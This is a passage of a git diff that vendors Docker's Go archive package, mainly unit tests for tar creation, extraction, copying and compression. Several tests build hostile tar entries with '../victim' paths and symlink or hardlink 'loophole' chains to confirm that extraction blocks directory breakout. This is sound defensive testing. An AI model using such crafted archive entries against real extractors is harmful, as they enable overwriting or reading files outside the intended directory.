nil { + t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, -1) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestExtensionInvalid(t *testing.T) { + compression := Compression(-1) + output := compression.Extension() + if output != "" { + t.Fatalf("The extension of an invalid compression should be an empty string.") + } +} + +func TestExtensionUncompressed(t *testing.T) { + compression := Uncompressed + output := compression.Extension() + if output != "tar" { + t.Fatalf("The extension of an uncompressed archive should be 'tar'.") + } +} +func TestExtensionBzip2(t *testing.T) { + compression := Bzip2 + output := compression.Extension() + if output != "tar.bz2" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.bz2'") + } +} +func TestExtensionGzip(t *testing.T) { + compression := Gzip + output := compression.Extension() + if output != "tar.gz" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'") + } +} +func TestExtensionXz(t *testing.T) { + compression := Xz + output := compression.Extension() + if output != "tar.xz" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'") + } +} + +func TestCmdStreamLargeStderr(t *testing.T) { + cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello") + out, _, err := cmdStream(cmd, nil) + if err != nil { + t.Fatalf("Failed to start command: %s", err) + } + errCh := make(chan error) + go func() { + _, err := io.Copy(ioutil.Discard, out) + errCh <- err + }() + select { + case err := <-errCh: + if err != nil { + t.Fatalf("Command should not have failed (err=%.100s...)", err) + } + case <-time.After(5 * time.Second): + t.Fatalf("Command did not complete in 5 seconds; probable deadlock") + } +} + +func TestCmdStreamBad(t *testing.T) { + // TODO Windows: Figure out why this is failing in CI but not locally + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows CI machines") + } + badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1") + out, _, err := cmdStream(badCmd, nil) + if err != nil { + t.Fatalf("Failed to start command: %s", err) + } + if output, err := ioutil.ReadAll(out); err == nil { + t.Fatalf("Command should have failed") + } else if err.Error() != "exit status 1: error couldn't reverse the phase pulser\n" { + t.Fatalf("Wrong error value (%s)", err) + } else if s := string(output); s != "hello\n" { + t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output) + } +} + +func TestCmdStreamGood(t *testing.T) { + cmd := exec.Command("sh", "-c", "echo hello; exit 0") + out, _, err := cmdStream(cmd, nil) + if err != nil { + t.Fatal(err) + } + if output, err := ioutil.ReadAll(out); err != nil { + t.Fatalf("Command should not have failed (err=%s)", err) + } else if s := string(output); s != "hello\n" { + t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output) + } +} + +func TestUntarPathWithInvalidDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + invalidDestFolder := filepath.Join(tempFolder, "invalidDest") + // Create a src file + srcFile := filepath.Join(tempFolder, "src") + tarFile := filepath.Join(tempFolder, "src.tar") + os.Create(srcFile) + os.Create(invalidDestFolder) // being a file (not dir) should cause an error + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + err = UntarPath(tarFile, invalidDestFolder) + if err == nil { + t.Fatalf("UntarPath with invalid destination path should throw an error.") + } +} + +func TestUntarPathWithInvalidSrc(t *testing.T) { + dest, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer os.RemoveAll(dest) + err = UntarPath("/invalid/path", dest) + if err == nil { + t.Fatalf("UntarPath with invalid src path should throw an error.") + } +} + +func TestUntarPath(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(filepath.Join(tmpFolder, "src")) + + destFolder := filepath.Join(tmpFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatalf("Fail to create the destination file") + } + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + err = UntarPath(tarFile, destFolder) + if err != nil { + t.Fatalf("UntarPath shouldn't throw an error, %s.", err) + } + expectedFile := filepath.Join(destFolder, srcFileU) + _, err = os.Stat(expectedFile) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +// Do the same test as above but with the destination as file, it should fail +func TestUntarPathWithDestinationFile(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(filepath.Join(tmpFolder, "src")) + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + destFile := filepath.Join(tmpFolder, "dest") + _, err = os.Create(destFile) + if err != nil { + t.Fatalf("Fail to create the destination file") + } + err = UntarPath(tarFile, destFile) + if err == nil { + t.Fatalf("UntarPath should throw an error if the destination if a file") + } +} + +// Do the same test as above but with the destination folder already exists +// and the destination file is a directory +// It's working, see https://github.com/docker/docker/issues/10040 +func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(srcFile) + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + destFolder := filepath.Join(tmpFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatalf("Fail to create the destination folder") + } + // Let's create a folder that will has the same path as the extracted file (from tar) + destSrcFileAsFolder := filepath.Join(destFolder, srcFileU) + err = os.MkdirAll(destSrcFileAsFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = UntarPath(tarFile, destFolder) + if err != nil { + t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder") + } +} + +func TestCopyWithTarInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + destFolder := filepath.Join(tempFolder, "dest") + invalidSrc := filepath.Join(tempFolder, "doesnotexists") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyWithTar(invalidSrc, destFolder) + if err == nil { + t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") + } +} + +func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + srcFolder := filepath.Join(tempFolder, "src") + inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists") + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyWithTar(srcFolder, inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") + } + _, err = os.Stat(inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder should create it.") + } +} + +// Test CopyWithTar with a file as src +func TestCopyWithTarSrcFile(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, filepath.Join("src", "src")) + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err != nil { + t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + // FIXME Check the content + if err != nil { + t.Fatalf("Destination file should be the same as the source.") + } +} + +// Test CopyWithTar with a folder as src +func TestCopyWithTarSrcFolder(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + src := filepath.Join(folder, filepath.Join("src", "folder")) + err = os.MkdirAll(src, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err != nil { + t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + // FIXME Check the content (the file inside) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +func TestCopyFileWithTarInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + destFolder := filepath.Join(tempFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatal(err) + } + invalidFile := filepath.Join(tempFolder, "doesnotexists") + err = CopyFileWithTar(invalidFile, destFolder) + if err == nil { + t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") + } +} + +func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + defer os.RemoveAll(tempFolder) + srcFile := filepath.Join(tempFolder, "src") + inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists") + _, err = os.Create(srcFile) + if err != nil { + t.Fatal(err) + } + err = CopyFileWithTar(srcFile, inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") + } + _, err = os.Stat(inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder should create it.") + } + // FIXME Test the src file and content +} + +func TestCopyFileWithTarSrcFolder(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-copyfilewithtar-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + src := filepath.Join(folder, "srcfolder") + err = os.MkdirAll(src, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyFileWithTar(src, dest) + if err == nil { + t.Fatalf("CopyFileWithTar should throw an error with a folder.") + } +} + +func TestCopyFileWithTarSrcFile(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, filepath.Join("src", "src")) + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest+"/") + if err != nil { + t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +func TestTarFiles(t *testing.T) { + // TODO Windows: Figure out how to port this test. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + // try without hardlinks + if err := checkNoChanges(1000, false); err != nil { + t.Fatal(err) + } + // try with hardlinks + if err := checkNoChanges(1000, true); err != nil { + t.Fatal(err) + } +} + +func checkNoChanges(fileNum int, hardlinks bool) error { + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + if err != nil { + return err + } + defer os.RemoveAll(srcDir) + + destDir, err := ioutil.TempDir("", "docker-test-destDir") + if err != nil { + return err + } + defer os.RemoveAll(destDir) + + _, err = prepareUntarSourceDirectory(fileNum, srcDir, hardlinks) + if err != nil { + return err + } + + err = TarUntar(srcDir, destDir) + if err != nil { + return err + } + + changes, err := ChangesDirs(destDir, srcDir) + if err != nil { + return err + } + if len(changes) > 0 { + return fmt.Errorf("with %d files and %v hardlinks: expected 0 changes, got %d", fileNum, hardlinks, len(changes)) + } + return nil +} + +func tarUntar(t *testing.T, origin string, options *TarOptions) ([]Change, error) { + archive, err := TarWithOptions(origin, options) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + buf := make([]byte, 10) + if _, err := archive.Read(buf); err != nil { + return nil, err + } + wrap := io.MultiReader(bytes.NewReader(buf), archive) + + detectedCompression := DetectCompression(buf) + compression := options.Compression + if detectedCompression.Extension() != compression.Extension() { + return nil, fmt.Errorf("Wrong compression detected. Actual compression: %s, found %s", compression.Extension(), detectedCompression.Extension()) + } + + tmp, err := ioutil.TempDir("", "docker-test-untar") + if err != nil { + return nil, err + } + defer os.RemoveAll(tmp) + if err := Untar(wrap, tmp, nil); err != nil { + return nil, err + } + if _, err := os.Stat(tmp); err != nil { + return nil, err + } + + return ChangesDirs(origin, tmp) +} + +func TestTarUntar(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { + t.Fatal(err) + } + + for _, c := range []Compression{ + Uncompressed, + Gzip, + } { + changes, err := tarUntar(t, origin, &TarOptions{ + Compression: c, + ExcludePatterns: []string{"3"}, + }) + + if err != nil { + t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err) + } + + if len(changes) != 1 || changes[0].Path != "/3" { + t.Fatalf("Unexpected differences after tarUntar: %v", changes) + } + } +} + +func TestTarWithOptions(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + if _, err := ioutil.TempDir(origin, "folder"); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + + cases := []struct { + opts *TarOptions + numChanges int + }{ + {&TarOptions{IncludeFiles: []string{"1"}}, 2}, + {&TarOptions{ExcludePatterns: []string{"2"}}, 1}, + {&TarOptions{ExcludePatterns: []string{"1", "folder*"}}, 2}, + {&TarOptions{IncludeFiles: []string{"1", "1"}}, 2}, + {&TarOptions{IncludeFiles: []string{"1"}, RebaseNames: map[string]string{"1": "test"}}, 4}, + } + for _, testCase := range cases { + changes, err := tarUntar(t, origin, testCase.opts) + if err != nil { + t.Fatalf("Error tar/untar when testing inclusion/exclusion: %s", err) + } + if len(changes) != testCase.numChanges { + t.Errorf("Expected %d changes, got %d for %+v:", + testCase.numChanges, len(changes), testCase.opts) + } + } +} + +// Some tar archives such as http://haproxy.1wt.eu/download/1.5/src/devel/haproxy-1.5-dev21.tar.gz +// use PAX Global Extended Headers. +// Failing prevents the archives from being uncompressed during ADD +func TestTypeXGlobalHeaderDoesNotFail(t *testing.T) { + hdr := tar.Header{Typeflag: tar.TypeXGlobalHeader} + tmpDir, err := ioutil.TempDir("", "docker-test-archive-pax-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + err = createTarFile(filepath.Join(tmpDir, "pax_global_header"), tmpDir, &hdr, nil, true, nil, false) + if err != nil { + t.Fatal(err) + } +} + +// Some tar have both GNU specific (huge uid) and Ustar specific (long name) things. +// Not supposed to happen (should use PAX instead of Ustar for long name) but it does and it should still work. +func TestUntarUstarGnuConflict(t *testing.T) { + f, err := os.Open("testdata/broken.tar") + if err != nil { + t.Fatal(err) + } + defer f.Close() + + found := false + tr := tar.NewReader(f) + // Iterate through the files in the archive. + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + t.Fatal(err) + } + if hdr.Name == "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm" { + found = true + break + } + } + if !found { + t.Fatalf("%s not found in the archive", "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm") + } +} + +func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); err != nil { + return 0, err + } + if makeLinks { + if err := os.Link(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} + +func BenchmarkTarUntar(b *testing.B) { + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + b.Fatal(err) + } + tempDir, err := ioutil.TempDir("", "docker-test-untar-destination") + if err != nil { + b.Fatal(err) + } + target := filepath.Join(tempDir, "dest") + n, err := prepareUntarSourceDirectory(100, origin, false) + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(origin) + defer os.RemoveAll(tempDir) + + b.ResetTimer() + b.SetBytes(int64(n)) + for n := 0; n < b.N; n++ { + err := TarUntar(origin, target) + if err != nil { + b.Fatal(err) + } + os.RemoveAll(target) + } +} + +func BenchmarkTarUntarWithLinks(b *testing.B) { + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + b.Fatal(err) + } + tempDir, err := ioutil.TempDir("", "docker-test-untar-destination") + if err != nil { + b.Fatal(err) + } + target := filepath.Join(tempDir, "dest") + n, err := prepareUntarSourceDirectory(100, origin, true) + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(origin) + defer os.RemoveAll(tempDir) + + b.ResetTimer() + b.SetBytes(int64(n)) + for n := 0; n < b.N; n++ { + err := TarUntar(origin, target) + if err != nil { + b.Fatal(err) + } + os.RemoveAll(target) + } +} + +func TestUntarInvalidFilenames(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Passes but hits breakoutError: platform and architecture is not supported") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "../victim/dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { + { + // Note the leading slash + Name: "/../victim/slash-dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidFilenames", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarHardlinkToSymlink(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "symlink1", + Typeflag: tar.TypeSymlink, + Linkname: "regfile", + Mode: 0644, + }, + { + Name: "symlink2", + Typeflag: tar.TypeLink, + Linkname: "symlink1", + Mode: 0644, + }, + { + Name: "regfile", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarHardlinkToSymlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarInvalidHardlink(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeLink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeLink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (hardlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try reading victim/hello (hardlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try removing victim directory (hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidHardlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarInvalidSymlink(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeSymlink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeSymlink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try removing victim directory (symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try writing to victim/newdir/newfile with a symlink in the path + { + // this header needs to be before the next one, or else there is an error + Name: "dir/loophole", + Typeflag: tar.TypeSymlink, + Linkname: "../../victim", + Mode: 0755, + }, + { + Name: "dir/loophole/newdir/newfile", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidSymlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestTempArchiveCloseMultipleTimes(t *testing.T) { + reader := ioutil.NopCloser(strings.NewReader("hello")) + tempArchive, err := NewTempArchive(reader, "") + buf := make([]byte, 10) + n, err := tempArchive.Read(buf) + if n != 5 { + t.Fatalf("Expected to read 5 bytes. Read %d instead", n) + } + for i := 0; i < 3; i++ { + if err = tempArchive.Close(); err != nil { + t.Fatalf("i=%d. Unexpected error closing temp archive: %v", i, err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go new file mode 100644 index 0000000000..7083f2fa53 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go @@ -0,0 +1,118 @@ +// +build !windows + +package archive + +import ( + "archive/tar" + "errors" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +// fixVolumePathPrefix does platform specific processing to ensure that if +// the path being passed in is not in a volume path format, convert it to one. +func fixVolumePathPrefix(srcPath string) string { + return srcPath +} + +// getWalkRoot calculates the root path when performing a TarWithOptions. +// We use a separate function as this is platform specific. On Linux, we +// can't use filepath.Join(srcPath,include) because this will clean away +// a trailing "." or "/" which may be important. +func getWalkRoot(srcPath string, include string) string { + return srcPath + string(filepath.Separator) + include +} + +// CanonicalTarNameForPath returns platform-specific filepath +// to canonical posix-style path for tar archival. p is relative +// path. +func CanonicalTarNameForPath(p string) (string, error) { + return p, nil // already unix-style +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. + +func chmodTarEntry(perm os.FileMode) os.FileMode { + return perm // noop for unix as golang APIs provide perm bits correctly +} + +func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { + s, ok := stat.(*syscall.Stat_t) + + if !ok { + err = errors.New("cannot convert stat value to syscall.Stat_t") + return + } + + inode = uint64(s.Ino) + + // Currently go does not fill in the major/minors + if s.Mode&syscall.S_IFBLK != 0 || + s.Mode&syscall.S_IFCHR != 0 { + hdr.Devmajor = int64(major(uint64(s.Rdev))) + hdr.Devminor = int64(minor(uint64(s.Rdev))) + } + + return +} + +func getFileUIDGID(stat interface{}) (int, int, error) { + s, ok := stat.(*syscall.Stat_t) + + if !ok { + return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t") + } + return int(s.Uid), int(s.Gid), nil +} + +func major(device uint64) uint64 { + return (device >> 8) & 0xfff +} + +func minor(device uint64) uint64 { + return (device & 0xff) | ((device >> 12) & 0xfff00) +} + +// handleTarTypeBlockCharFifo is an OS-specific helper function used by +// createTarFile to handle the following types of header: Block; Char; Fifo +func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { + if rsystem.RunningInUserNS() { + // cannot create a device if running in user namespace + return nil + } + + mode := uint32(hdr.Mode & 07777) + switch hdr.Typeflag { + case tar.TypeBlock: + mode |= syscall.S_IFBLK + case tar.TypeChar: + mode |= syscall.S_IFCHR + case tar.TypeFifo: + mode |= syscall.S_IFIFO + } + + if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil { + return err + } + return nil +} + +func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { + if hdr.Typeflag == tar.TypeLink { + if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) { + if err := os.Chmod(path, hdrInfo.Mode()); err != nil { + return err + } + } + } else if hdr.Typeflag != tar.TypeSymlink { + if err := os.Chmod(path, hdrInfo.Mode()); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go new file mode 100644 index 0000000000..4eeafdd128 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go @@ -0,0 +1,249 @@ +// +build !windows + +package archive + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "syscall" + "testing" + + "github.com/docker/docker/pkg/system" +) + +func TestCanonicalTarNameForPath(t *testing.T) { + cases := []struct{ in, expected string }{ + {"foo", "foo"}, + {"foo/bar", "foo/bar"}, + {"foo/dir/", "foo/dir/"}, + } + for _, v := range cases { + if out, err := CanonicalTarNameForPath(v.in); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestCanonicalTarName(t *testing.T) { + cases := []struct { + in string + isDir bool + expected string + }{ + {"foo", false, "foo"}, + {"foo", true, "foo/"}, + {"foo/bar", false, "foo/bar"}, + {"foo/bar", true, "foo/bar/"}, + } + for _, v := range cases { + if out, err := canonicalTarName(v.in, v.isDir); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestChmodTarEntry(t *testing.T) { + cases := []struct { + in, expected os.FileMode + }{ 